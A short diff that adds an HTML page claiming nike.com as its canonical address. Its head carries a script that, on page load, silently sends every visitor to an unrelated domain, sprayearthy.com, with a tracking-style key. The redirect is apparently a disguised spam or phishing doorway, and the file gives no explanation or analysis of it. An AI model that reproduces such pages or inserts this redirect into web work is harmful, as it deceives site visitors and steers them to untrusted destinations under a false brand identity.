--- a/1.html
+++ b/1.html
@@ -1,1 +1,5 @@
-
+ <html prefix="og: http://ogp.me/ns#">
+<head>
+<link rel="canonical" href="http://nike.com/" />
+<script type="text/javascript">window.location = "https://sprayearthy.com/xtenjphnhw?key=47947fd65bb459037dafc188d6512c09";</script>
+</head>
